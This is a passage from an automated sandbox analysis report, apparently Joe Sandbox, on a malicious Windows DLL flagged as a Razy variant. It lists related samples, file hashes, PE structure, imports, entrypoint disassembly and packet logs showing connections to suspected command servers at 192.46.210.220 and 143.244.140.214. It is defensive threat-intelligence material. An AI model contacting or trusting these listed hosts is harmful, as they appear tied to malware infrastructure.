                        • Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, RuntimeBroker.exe, WMIADAP.exe, conhost.exe, backgroundTaskHost.exe, svchost.exe, wuapihost.exe
                        • TCP Packets have been reduced to 100
                        • Excluded IPs from analysis (whitelisted): 173.222.108.226, 173.222.108.210, 20.82.209.183, 23.211.4.86, 20.82.210.154, 80.67.82.211, 80.67.82.235, 20.54.110.249, 40.112.88.60, 52.251.79.25, 40.91.112.76
                        • Excluded domains from analysis (whitelisted): displaycatalog-rp-uswest.md.mp.microsoft.com.akadns.net, consumer-displaycatalogrp-aks2aks-useast.md.mp.microsoft.com.akadns.net, iris-de-prod-azsc-neu-b.northeurope.cloudapp.azure.com, a767.dspw65.akamai.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, a1449.dscg2.akamai.net, wus2-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, arc.msn.com, consumer-displaycatalogrp-aks2aks-europe.md.mp.microsoft.com.akadns.net, arc.trafficmanager.net, consumer-displaycatalogrp-aks2aks-uswest.md.mp.microsoft.com.akadns.net, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, iris-de-prod-azsc-neu.northeurope.cloudapp.azure.com, fs.microsoft.com, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, wu-shim.trafficmanager.net, neu-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, ris-prod.trafficmanager.net, asf-ris-prod-neu.northeurope.cloudapp.azure.com, eus2-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, ctldl.windowsupdate.com, e1723.g.akamaiedge.net, download.windowsupdate.com.edgesuite.net, ris.api.iris.microsoft.com, displaycatalog-rp-useast.md.mp.microsoft.com.akadns.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net
                        • Not all processes where analyzed, report is missing behavior information
                        • Report size exceeded maximum capacity and may have missing behavior information.
                        • Report size getting too big, too many NtDeviceIoControlFile calls found.
                        • Report size getting too big, too many NtEnumerateKey calls found.
                        • Report size getting too big, too many NtEnumerateValueKey calls found.
                        • Report size getting too big, too many NtOpenKeyEx calls found.
                        • Report size getting too big, too many NtQueryValueKey calls found.

                        Simulations

                        Behavior and APIs

                        TimeTypeDescription
                        05:03:47API Interceptor170x Sleep call for process: rundll32.exe modified
                        05:03:48API Interceptor170x Sleep call for process: loaddll32.exe modified

                        Joe Sandbox View / Context

                        IPs

                        MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                        45.77.0.96SecuriteInfo.com.Variant.Razy.980776.31954.dllGet hashmaliciousBrowse
                          SecuriteInfo.com.Variant.Razy.980776.10558.dllGet hashmaliciousBrowse
                            SecuriteInfo.com.Variant.Razy.980776.8232.dllGet hashmaliciousBrowse
                              SecuriteInfo.com.Variant.Razy.980776.30568.dllGet hashmaliciousBrowse
                                SecuriteInfo.com.Variant.Razy.980776.9478.dllGet hashmaliciousBrowse
                                  SecuriteInfo.com.Variant.Razy.980776.28061.dllGet hashmaliciousBrowse
                                    SecuriteInfo.com.Variant.Razy.980776.25006.dllGet hashmaliciousBrowse
                                      SecuriteInfo.com.Variant.Razy.980776.28328.dllGet hashmaliciousBrowse
                                        SecuriteInfo.com.Variant.Razy.980776.4470.dllGet hashmaliciousBrowse
                                          SecuriteInfo.com.Variant.Razy.980776.14159.dllGet hashmaliciousBrowse
                                            SecuriteInfo.com.Variant.Razy.980776.20807.dllGet hashmaliciousBrowse
                                              SecuriteInfo.com.Variant.Razy.980776.27063.dllGet hashmaliciousBrowse
                                                SecuriteInfo.com.Variant.Razy.980776.2260.dllGet hashmaliciousBrowse
                                                  SecuriteInfo.com.Variant.Razy.980776.12452.dllGet hashmaliciousBrowse
                                                    SecuriteInfo.com.Variant.Razy.980776.6851.dllGet hashmaliciousBrowse
                                                      SecuriteInfo.com.Variant.Razy.980776.2379.dllGet hashmaliciousBrowse
                                                        SecuriteInfo.com.Variant.Razy.980776.10617.dllGet hashmaliciousBrowse
                                                          SecuriteInfo.com.Variant.Razy.980776.24814.dllGet hashmaliciousBrowse
                                                            SecuriteInfo.com.Variant.Razy.980776.29553.dllGet hashmaliciousBrowse
                                                              SecuriteInfo.com.Variant.Razy.980776.15127.dllGet hashmaliciousBrowse
                                                                185.56.219.47SecuriteInfo.com.Variant.Razy.980776.31954.dllGet hashmaliciousBrowse
                                                                  SecuriteInfo.com.Variant.Razy.980776.10558.dllGet hashmaliciousBrowse
                                                                    SecuriteInfo.com.Variant.Razy.980776.8232.dllGet hashmaliciousBrowse
                                                                      SecuriteInfo.com.Variant.Razy.980776.30568.dllGet hashmaliciousBrowse
                                                                        SecuriteInfo.com.Variant.Razy.980776.9478.dllGet hashmaliciousBrowse
                                                                          SecuriteInfo.com.Variant.Razy.980776.28061.dllGet hashmaliciousBrowse
                                                                            SecuriteInfo.com.Variant.Razy.980776.25006.dllGet hashmaliciousBrowse
                                                                              SecuriteInfo.com.Variant.Razy.980776.28328.dllGet hashmaliciousBrowse
                                                                                SecuriteInfo.com.Variant.Razy.980776.4470.dllGet hashmaliciousBrowse
                                                                                  SecuriteInfo.com.Variant.Razy.980776.14159.dllGet hashmaliciousBrowse
                                                                                    SecuriteInfo.com.Variant.Razy.980776.20807.dllGet hashmaliciousBrowse
                                                                                      SecuriteInfo.com.Variant.Razy.980776.27063.dllGet hashmaliciousBrowse
                                                                                        SecuriteInfo.com.Variant.Razy.980776.2260.dllGet hashmaliciousBrowse
                                                                                          SecuriteInfo.com.Variant.Razy.980776.12452.dllGet hashmaliciousBrowse
                                                                                            SecuriteInfo.com.Variant.Razy.980776.6851.dllGet hashmaliciousBrowse
                                                                                              SecuriteInfo.com.Variant.Razy.980776.2379.dllGet hashmaliciousBrowse
                                                                                                SecuriteInfo.com.Variant.Razy.980776.10617.dllGet hashmaliciousBrowse
                                                                                                  SecuriteInfo.com.Variant.Razy.980776.24814.dllGet hashmaliciousBrowse
                                                                                                    SecuriteInfo.com.Variant.Razy.980776.29553.dllGet hashmaliciousBrowse
                                                                                                      SecuriteInfo.com.Variant.Razy.980776.15127.dllGet hashmaliciousBrowse

                                                                                                        Domains

                                                                                                        No context

                                                                                                        ASN

                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                        KELIWEBITSecuriteInfo.com.Variant.Razy.980776.31954.dllGet hashmaliciousBrowse
                                                                                                        • 185.56.219.47
                                                                                                        SecuriteInfo.com.Variant.Razy.980776.10558.dllGet hashmaliciousBrowse
                                                                                                        • 185.56.219.47
                                                                                                        SecuriteInfo.com.Variant.Razy.980776.8232.dllGet hashmaliciousBrowse
                                                                                                        • 185.56.219.47
                                                                                                        SecuriteInfo.com.Variant.Razy.980776.30568.dllGet hashmaliciousBrowse
                                                                                                        • 185.56.219.47
                                                                                                        SecuriteInfo.com.Variant.Razy.980776.9478.dllGet hashmaliciousBrowse
                                                                                                        • 185.56.219.47
                                                                                                        SecuriteInfo.com.Variant.Razy.980776.28061.dllGet hashmaliciousBrowse
                                                                                                        • 185.56.219.47
                                                                                                        SecuriteInfo.com.Variant.Razy.980776.25006.dllGet hashmaliciousBrowse
                                                                                                        • 185.56.219.47
                                                                                                        SecuriteInfo.com.Variant.Razy.980776.28328.dllGet hashmaliciousBrowse
                                                                                                        • 185.56.219.47
                                                                                                        SecuriteInfo.com.Variant.Razy.980776.4470.dllGet hashmaliciousBrowse
                                                                                                        • 185.56.219.47
                                                                                                        SecuriteInfo.com.Variant.Razy.980776.14159.dllGet hashmaliciousBrowse
                                                                                                        • 185.56.219.47
                                                                                                        SecuriteInfo.com.Variant.Razy.980776.20807.dllGet hashmaliciousBrowse
                                                                                                        • 185.56.219.47
                                                                                                        SecuriteInfo.com.Variant.Razy.980776.27063.dllGet hashmaliciousBrowse
                                                                                                        • 185.56.219.47
                                                                                                        SecuriteInfo.com.Variant.Razy.980776.2260.dllGet hashmaliciousBrowse
                                                                                                        • 185.56.219.47
                                                                                                        SecuriteInfo.com.Variant.Razy.980776.12452.dllGet hashmaliciousBrowse
                                                                                                        • 185.56.219.47
                                                                                                        SecuriteInfo.com.Variant.Razy.980776.6851.dllGet hashmaliciousBrowse
                                                                                                        • 185.56.219.47
                                                                                                        SecuriteInfo.com.Variant.Razy.980776.2379.dllGet hashmaliciousBrowse
                                                                                                        • 185.56.219.47
                                                                                                        SecuriteInfo.com.Variant.Razy.980776.10617.dllGet hashmaliciousBrowse
                                                                                                        • 185.56.219.47
                                                                                                        SecuriteInfo.com.Variant.Razy.980776.24814.dllGet hashmaliciousBrowse
                                                                                                        • 185.56.219.47
                                                                                                        SecuriteInfo.com.Variant.Razy.980776.29553.dllGet hashmaliciousBrowse
                                                                                                        • 185.56.219.47
                                                                                                        SecuriteInfo.com.Variant.Razy.980776.15127.dllGet hashmaliciousBrowse
                                                                                                        • 185.56.219.47
                                                                                                        AS-CHOOPAUSSecuriteInfo.com.Variant.Razy.980776.31954.dllGet hashmaliciousBrowse
                                                                                                        • 45.77.0.96
                                                                                                        SecuriteInfo.com.Variant.Razy.980776.10558.dllGet hashmaliciousBrowse
                                                                                                        • 45.77.0.96
                                                                                                        SecuriteInfo.com.Variant.Razy.980776.8232.dllGet hashmaliciousBrowse
                                                                                                        • 45.77.0.96
                                                                                                        SecuriteInfo.com.Variant.Razy.980776.30568.dllGet hashmaliciousBrowse
                                                                                                        • 45.77.0.96
                                                                                                        SecuriteInfo.com.Variant.Razy.980776.9478.dllGet hashmaliciousBrowse
                                                                                                        • 45.77.0.96
                                                                                                        SecuriteInfo.com.Variant.Razy.980776.28061.dllGet hashmaliciousBrowse
                                                                                                        • 45.77.0.96
                                                                                                        SecuriteInfo.com.Variant.Razy.980776.25006.dllGet hashmaliciousBrowse
                                                                                                        • 45.77.0.96
                                                                                                        SecuriteInfo.com.Variant.Razy.980776.28328.dllGet hashmaliciousBrowse
                                                                                                        • 45.77.0.96
                                                                                                        SecuriteInfo.com.Variant.Razy.980776.4470.dllGet hashmaliciousBrowse
                                                                                                        • 45.77.0.96
                                                                                                        SecuriteInfo.com.Variant.Razy.980776.14159.dllGet hashmaliciousBrowse
                                                                                                        • 45.77.0.96
                                                                                                        SecuriteInfo.com.Variant.Razy.980776.20807.dllGet hashmaliciousBrowse
                                                                                                        • 45.77.0.96
                                                                                                        SecuriteInfo.com.Variant.Razy.980776.27063.dllGet hashmaliciousBrowse
                                                                                                        • 45.77.0.96
                                                                                                        SecuriteInfo.com.Variant.Razy.980776.2260.dllGet hashmaliciousBrowse
                                                                                                        • 45.77.0.96
                                                                                                        SecuriteInfo.com.Variant.Razy.980776.12452.dllGet hashmaliciousBrowse
                                                                                                        • 45.77.0.96
                                                                                                        SecuriteInfo.com.Variant.Razy.980776.6851.dllGet hashmaliciousBrowse
                                                                                                        • 45.77.0.96
                                                                                                        SecuriteInfo.com.Variant.Razy.980776.2379.dllGet hashmaliciousBrowse
                                                                                                        • 45.77.0.96
                                                                                                        SecuriteInfo.com.Variant.Razy.980776.10617.dllGet hashmaliciousBrowse
                                                                                                        • 45.77.0.96
                                                                                                        SecuriteInfo.com.Variant.Razy.980776.24814.dllGet hashmaliciousBrowse
                                                                                                        • 45.77.0.96
                                                                                                        SecuriteInfo.com.Variant.Razy.980776.29553.dllGet hashmaliciousBrowse
                                                                                                        • 45.77.0.96
                                                                                                        SecuriteInfo.com.Variant.Razy.980776.15127.dllGet hashmaliciousBrowse
                                                                                                        • 45.77.0.96

                                                                                                        JA3 Fingerprints

                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                        51c64c77e60f3980eea90869b68c58a8SecuriteInfo.com.Variant.Razy.980776.31954.dllGet hashmaliciousBrowse
                                                                                                        • 192.46.210.220
                                                                                                        SecuriteInfo.com.Variant.Razy.980776.10558.dllGet hashmaliciousBrowse
                                                                                                        • 192.46.210.220
                                                                                                        SecuriteInfo.com.Variant.Razy.980776.8232.dllGet hashmaliciousBrowse
                                                                                                        • 192.46.210.220
                                                                                                        SecuriteInfo.com.Variant.Razy.980776.30568.dllGet hashmaliciousBrowse
                                                                                                        • 192.46.210.220
                                                                                                        SecuriteInfo.com.Variant.Razy.980776.9478.dllGet hashmaliciousBrowse
                                                                                                        • 192.46.210.220
                                                                                                        SecuriteInfo.com.Variant.Razy.980776.28061.dllGet hashmaliciousBrowse
                                                                                                        • 192.46.210.220
                                                                                                        SecuriteInfo.com.Variant.Razy.980776.25006.dllGet hashmaliciousBrowse
                                                                                                        • 192.46.210.220
                                                                                                        SecuriteInfo.com.Variant.Razy.980776.28328.dllGet hashmaliciousBrowse
                                                                                                        • 192.46.210.220
                                                                                                        SecuriteInfo.com.Variant.Razy.980776.4470.dllGet hashmaliciousBrowse
                                                                                                        • 192.46.210.220
                                                                                                        SecuriteInfo.com.Variant.Razy.980776.14159.dllGet hashmaliciousBrowse
                                                                                                        • 192.46.210.220
                                                                                                        SecuriteInfo.com.Variant.Razy.980776.20807.dllGet hashmaliciousBrowse
                                                                                                        • 192.46.210.220
                                                                                                        SecuriteInfo.com.Variant.Razy.980776.27063.dllGet hashmaliciousBrowse
                                                                                                        • 192.46.210.220
                                                                                                        SecuriteInfo.com.Variant.Razy.980776.2260.dllGet hashmaliciousBrowse
                                                                                                        • 192.46.210.220
                                                                                                        SecuriteInfo.com.Variant.Razy.980776.12452.dllGet hashmaliciousBrowse
                                                                                                        • 192.46.210.220
                                                                                                        SecuriteInfo.com.Variant.Razy.980776.6851.dllGet hashmaliciousBrowse
                                                                                                        • 192.46.210.220
                                                                                                        SecuriteInfo.com.Variant.Razy.980776.2379.dllGet hashmaliciousBrowse
                                                                                                        • 192.46.210.220
                                                                                                        SecuriteInfo.com.Variant.Razy.980776.10617.dllGet hashmaliciousBrowse
                                                                                                        • 192.46.210.220
                                                                                                        SecuriteInfo.com.Variant.Razy.980776.24814.dllGet hashmaliciousBrowse
                                                                                                        • 192.46.210.220
                                                                                                        SecuriteInfo.com.Variant.Razy.980776.29553.dllGet hashmaliciousBrowse
                                                                                                        • 192.46.210.220
                                                                                                        SecuriteInfo.com.Variant.Razy.980776.15127.dllGet hashmaliciousBrowse
                                                                                                        • 192.46.210.220

                                                                                                        Dropped Files

                                                                                                        No context

                                                                                                        Created / dropped Files

                                                                                                        C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506
                                                                                                        Process:C:\Windows\SysWOW64\rundll32.exe
                                                                                                        File Type:data
                                                                                                        Category:modified
                                                                                                        Size (bytes):326
                                                                                                        Entropy (8bit):3.4145988351536807
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:6:kK7s8i8EMl/s8gFN+SkQlPlEGYRMY9z+4KlDA3RUeOlEfcTt:D9iW/Y2kPlE99SNxAhUefit
                                                                                                        MD5:DED1536689863466A0127B6A5906C225
                                                                                                        SHA1:F5D0B9678A1A1CD80AB52C7A677E933CC5B4326F
                                                                                                        SHA-256:E984AB0802CFAB2E713433C29CE65BE82252F61046973EFEC4DD66EF52FFB313
                                                                                                        SHA-512:D7CD383D0D720FE026E6CD543ED773CA8732E4008949C5E815CF8C08BE810E4AAE35463E71526A6EBFE45FDE71D9549FBFB7709FC5DFA9F24F56F237586A869D
                                                                                                        Malicious:false
                                                                                                        Reputation:low
                                                                                                        Preview: p...... ........9..&....(...............................................5....... ...........^.......$...............h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".0.a.a.8.a.1.5.e.a.6.d.7.1.:.0."...

                                                                                                        Static File Info

                                                                                                        General

                                                                                                        File type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                        Entropy (8bit):6.4397521906978215
                                                                                                        TrID:
                                                                                                        • Win32 Dynamic Link Library (generic) (1002004/3) 99.60%
                                                                                                        • Generic Win/DOS Executable (2004/3) 0.20%
                                                                                                        • DOS Executable Generic (2002/1) 0.20%
                                                                                                        • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                        File name:SecuriteInfo.com.Variant.Razy.980776.19803.dll
                                                                                                        File size:1375232
                                                                                                        MD5:617b1fd1bfdab72e5562c0c2f7600bcb
                                                                                                        SHA1:9e5bf19ba51cbd5849a225f022b939a48e5769b3
                                                                                                        SHA256:9b9c38d267cedfb2c423fbad71a50f76d0743a3ecc8f6027029fa13ea36e00e4
                                                                                                        SHA512:36ca0f3dc290ee75af38b97cc66e9c8f799b2c1e952aedf90528aa179803f40450647c31bf4c14ea50c6fa35027741c8520f7200011010463b904be3553aca96
                                                                                                        SSDEEP:24576:inxqsL+DvNdnhMr5Lo6dOGcuQNrSH9d6N9eYWtZgDxxxSPnsqz7puATt5csRbu74:icfk82uAJTI7KPswKwuS
                                                                                                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........!.g.@.4.@.4.@.43.j4.@.4.8.4.@.4.(.5.@.4.(.5.@.4.(.5.@.4.(.5.@.43.n4.@.4.@.4.A.4.(.5.@.4.(.5.@.4.(a4.@.4.(.5.@.4Rich.@.4.......

                                                                                                        File Icon

                                                                                                        Icon Hash:74f0e4ecccdce0e4

                                                                                                        Static PE Info

                                                                                                        General

                                                                                                        Entrypoint:0x4336b0
                                                                                                        Entrypoint Section:.text
                                                                                                        Digitally signed:false
                                                                                                        Imagebase:0x400000
                                                                                                        Subsystem:windows gui
                                                                                                        Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
                                                                                                        DLL Characteristics:DYNAMIC_BASE, NX_COMPAT
                                                                                                        Time Stamp:0x5BBD9691 [Wed Oct 10 06:05:05 2018 UTC]
                                                                                                        TLS Callbacks:
                                                                                                        CLR (.Net) Version:
                                                                                                        OS Version Major:6
                                                                                                        OS Version Minor:0
                                                                                                        File Version Major:6
                                                                                                        File Version Minor:0
                                                                                                        Subsystem Version Major:6
                                                                                                        Subsystem Version Minor:0
                                                                                                        Import Hash:ccbe70d6d0d02f6248ca160d6a0bb85b

                                                                                                        Entrypoint Preview

                                                                                                        Instruction
                                                                                                        push ebp
                                                                                                        mov ebp, esp
                                                                                                        cmp dword ptr [ebp+0Ch], 01h
                                                                                                        jne 00007FE1509E9B77h
                                                                                                        call 00007FE1509EA8A7h
                                                                                                        mov eax, dword ptr [ebp+10h]
                                                                                                        push eax
                                                                                                        mov ecx, dword ptr [ebp+0Ch]
                                                                                                        push ecx
                                                                                                        mov edx, dword ptr [ebp+08h]
                                                                                                        push edx
                                                                                                        call 00007FE1509E9966h
                                                                                                        add esp, 0Ch
                                                                                                        pop ebp
                                                                                                        retn 000Ch
                                                                                                        int3
                                                                                                        int3
                                                                                                        int3
                                                                                                        int3
                                                                                                        int3
                                                                                                        int3
                                                                                                        int3
                                                                                                        int3
                                                                                                        int3
                                                                                                        int3
                                                                                                        push ebp
                                                                                                        mov ebp, esp
                                                                                                        mov eax, dword ptr [0054806Ch]
                                                                                                        xor edx, edx
                                                                                                        mov ecx, 00000020h
                                                                                                        div ecx
                                                                                                        push edx
                                                                                                        mov edx, dword ptr [ebp+08h]
                                                                                                        xor edx, dword ptr [0054806Ch]
                                                                                                        push edx
                                                                                                        call 00007FE1509E9BB4h
                                                                                                        add esp, 08h
                                                                                                        pop ebp
                                                                                                        ret
                                                                                                        int3
                                                                                                        int3
                                                                                                        int3
                                                                                                        int3
                                                                                                        int3
                                                                                                        int3
                                                                                                        int3
                                                                                                        int3
                                                                                                        int3
                                                                                                        int3
                                                                                                        push ebp
                                                                                                        mov ebp, esp
                                                                                                        mov eax, dword ptr [0054806Ch]
                                                                                                        xor edx, edx
                                                                                                        mov ecx, 00000020h
                                                                                                        div ecx
                                                                                                        mov eax, 00000020h
                                                                                                        sub eax, edx
                                                                                                        push eax
                                                                                                        mov ecx, dword ptr [ebp+08h]
                                                                                                        push ecx
                                                                                                        call 00007FE1509E9B83h
                                                                                                        add esp, 08h
                                                                                                        xor eax, dword ptr [0054806Ch]
                                                                                                        pop ebp
                                                                                                        ret
                                                                                                        int3
                                                                                                        int3
                                                                                                        int3
                                                                                                        push ebp
                                                                                                        mov ebp, esp
                                                                                                        mov eax, dword ptr [ebp+08h]
                                                                                                        mov ecx, dword ptr [ebp+0Ch]
                                                                                                        ror eax, cl
                                                                                                        pop ebp
                                                                                                        ret
                                                                                                        int3
                                                                                                        int3
                                                                                                        int3
                                                                                                        push ebp
                                                                                                        mov ebp, esp
                                                                                                        call 00007FE1509EAF0Dh
                                                                                                        push eax
                                                                                                        call 00007FE150A2BC17h
                                                                                                        add esp, 04h
                                                                                                        pop ebp
                                                                                                        ret
                                                                                                        int3
                                                                                                        int3
                                                                                                        int3
                                                                                                        int3
                                                                                                        int3
                                                                                                        int3
                                                                                                        int3
                                                                                                        int3
                                                                                                        int3
                                                                                                        int3
                                                                                                        int3
                                                                                                        int3
                                                                                                        int3
                                                                                                        push ebp
                                                                                                        mov ebp, esp
                                                                                                        sub esp, 18h
                                                                                                        mov eax, dword ptr [ebp+00h]

                                                                                                        Data Directories

                                                                                                        NameVirtual AddressVirtual Size Is in Section
                                                                                                        IMAGE_DIRECTORY_ENTRY_EXPORT0x1471900x6c.rdata
                                                                                                        IMAGE_DIRECTORY_ENTRY_IMPORT0x1471fc0x28.rdata
                                                                                                        IMAGE_DIRECTORY_ENTRY_RESOURCE0x00x0
                                                                                                        IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                        IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                        IMAGE_DIRECTORY_ENTRY_BASERELOC0x15c0000x72b4.reloc
                                                                                                        IMAGE_DIRECTORY_ENTRY_DEBUG0x1431100x54.rdata
                                                                                                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                        IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x1431680x40.rdata
                                                                                                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                        IMAGE_DIRECTORY_ENTRY_IAT0xc70000x184.rdata
                                                                                                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                        IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                        Sections

                                                                                                        NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                        .text0x10000xc5e2f0xc6000False0.442065922901data6.47812452769IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                                                                        .rdata0xc70000x80aec0x80c00False0.534105734223data5.52054992664IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                        .data0x1480000x13ba00x1800False0.1875DOS executable (block device driverpyright)3.99635070896IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                                                                                        .reloc0x15c0000x72b40x7400False0.710264008621data6.69742088731IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                                                        Imports

                                                                                                        DLLImport
                                                                                                        KERNEL32.dllGetCurrentDirectoryA, GetTempPathA, GetWindowsDirectoryA, VirtualProtectEx, FindFirstChangeNotificationA, FlushFileBuffers, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, EncodePointer, DecodePointer, SetLastError, InitializeCriticalSectionAndSpinCount, CreateEventW, SwitchToThread, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, GetSystemTimeAsFileTime, GetTickCount, GetModuleHandleW, GetProcAddress, WideCharToMultiByte, MultiByteToWideChar, GetStringTypeW, CompareStringW, LCMapStringW, GetLocaleInfoW, GetCPInfo, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetCurrentProcess, TerminateProcess, IsProcessorFeaturePresent, QueryPerformanceCounter, GetCurrentProcessId, GetCurrentThreadId, InitializeSListHead, IsDebuggerPresent, GetStartupInfoW, RtlUnwind, RaiseException, InterlockedPushEntrySList, InterlockedFlushSList, GetLastError, FreeLibrary, LoadLibraryExW, GetModuleFileNameA, GetModuleFileNameW, GetModuleHandleExW, HeapAlloc, HeapValidate, GetSystemInfo, ExitProcess, GetStdHandle, GetFileType, WriteFile, OutputDebugStringA, OutputDebugStringW, WriteConsoleW, CloseHandle, WaitForSingleObjectEx, CreateThread, SetConsoleCtrlHandler, GetCurrentThread, GetDateFormatW, GetTimeFormatW, IsValidLocale, GetUserDefaultLCID, EnumSystemLocalesW, HeapFree, HeapReAlloc, HeapSize, HeapQueryInformation, GetACP, GetProcessHeap, GetTimeZoneInformation, FindClose, FindFirstFileExA, FindFirstFileExW, FindNextFileA, FindNextFileW, IsValidCodePage, GetOEMCP, GetCommandLineA, GetCommandLineW, GetEnvironmentStringsW, FreeEnvironmentStringsW, SetEnvironmentVariableA, SetEnvironmentVariableW, SetStdHandle, GetConsoleCP, GetConsoleMode, SetFilePointerEx, CreateFileW

                                                                                                        Exports

                                                                                                        NameOrdinalAddress
                                                                                                        Bluewing10x49eed0
                                                                                                        Earth20x49efd0
                                                                                                        Masterjust30x49eb20

                                                                                                        Network Behavior

                                                                                                        Network Port Distribution

                                                                                                        TCP Packets

                                                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                                                        Oct 28, 2021 05:03:44.544986010 CEST49744443192.168.2.3192.46.210.220
                                                                                                        Oct 28, 2021 05:03:44.545033932 CEST44349744192.46.210.220192.168.2.3
                                                                                                        Oct 28, 2021 05:03:44.545109987 CEST49744443192.168.2.3192.46.210.220
                                                                                                        Oct 28, 2021 05:03:44.620223999 CEST49744443192.168.2.3192.46.210.220
                                                                                                        Oct 28, 2021 05:03:44.620244980 CEST44349744192.46.210.220192.168.2.3
                                                                                                        Oct 28, 2021 05:03:45.131452084 CEST44349744192.46.210.220192.168.2.3
                                                                                                        Oct 28, 2021 05:03:45.131642103 CEST49744443192.168.2.3192.46.210.220
                                                                                                        Oct 28, 2021 05:03:46.076596975 CEST49744443192.168.2.3192.46.210.220
                                                                                                        Oct 28, 2021 05:03:46.076620102 CEST44349744192.46.210.220192.168.2.3
                                                                                                        Oct 28, 2021 05:03:46.077212095 CEST44349744192.46.210.220192.168.2.3
                                                                                                        Oct 28, 2021 05:03:46.077294111 CEST49744443192.168.2.3192.46.210.220
                                                                                                        Oct 28, 2021 05:03:46.096429110 CEST49744443192.168.2.3192.46.210.220
                                                                                                        Oct 28, 2021 05:03:46.096550941 CEST49744443192.168.2.3192.46.210.220
                                                                                                        Oct 28, 2021 05:03:46.096616030 CEST44349744192.46.210.220192.168.2.3
                                                                                                        Oct 28, 2021 05:03:46.789201021 CEST44349744192.46.210.220192.168.2.3
                                                                                                        Oct 28, 2021 05:03:46.789397001 CEST44349744192.46.210.220192.168.2.3
                                                                                                        Oct 28, 2021 05:03:46.789624929 CEST49744443192.168.2.3192.46.210.220
                                                                                                        Oct 28, 2021 05:03:46.791877985 CEST49744443192.168.2.3192.46.210.220
                                                                                                        Oct 28, 2021 05:03:47.443461895 CEST49744443192.168.2.3192.46.210.220
                                                                                                        Oct 28, 2021 05:03:47.443500996 CEST44349744192.46.210.220192.168.2.3
                                                                                                        Oct 28, 2021 05:03:47.719405890 CEST49747443192.168.2.3192.46.210.220
                                                                                                        Oct 28, 2021 05:03:47.719451904 CEST44349747192.46.210.220192.168.2.3
                                                                                                        Oct 28, 2021 05:03:47.719566107 CEST49747443192.168.2.3192.46.210.220
                                                                                                        Oct 28, 2021 05:03:47.755199909 CEST49747443192.168.2.3192.46.210.220
                                                                                                        Oct 28, 2021 05:03:47.755224943 CEST44349747192.46.210.220192.168.2.3
                                                                                                        Oct 28, 2021 05:03:47.855127096 CEST49748808192.168.2.3143.244.140.214
                                                                                                        Oct 28, 2021 05:03:48.013389111 CEST80849748143.244.140.214192.168.2.3
                                                                                                        Oct 28, 2021 05:03:48.013540983 CEST49748808192.168.2.3143.244.140.214
                                                                                                        Oct 28, 2021 05:03:48.016355038 CEST49748808192.168.2.3143.244.140.214
                                                                                                        Oct 28, 2021 05:03:48.174503088 CEST80849748143.244.140.214192.168.2.3
                                                                                                        Oct 28, 2021 05:03:48.176039934 CEST80849748143.244.140.214192.168.2.3
                                                                                                        Oct 28, 2021 05:03:48.176173925 CEST49748808192.168.2.3143.244.140.214
                                                                                                        Oct 28, 2021 05:03:48.244252920 CEST44349747192.46.210.220192.168.2.3
                                                                                                        Oct 28, 2021 05:03:48.244374990 CEST49747443192.168.2.3192.46.210.220
                                                                                                        Oct 28, 2021 05:03:48.546824932 CEST49747443192.168.2.3192.46.210.220
                                                                                                        Oct 28, 2021 05:03:48.546881914 CEST44349747192.46.210.220192.168.2.3
                                                                                                        Oct 28, 2021 05:03:48.547430038 CEST44349747192.46.210.220192.168.2.3
                                                                                                        Oct 28, 2021 05:03:48.547503948 CEST49747443192.168.2.3192.46.210.220
                                                                                                        Oct 28, 2021 05:03:48.551306009 CEST49747443192.168.2.3192.46.210.220
                                                                                                        Oct 28, 2021 05:03:48.551408052 CEST49747443192.168.2.3192.46.210.220
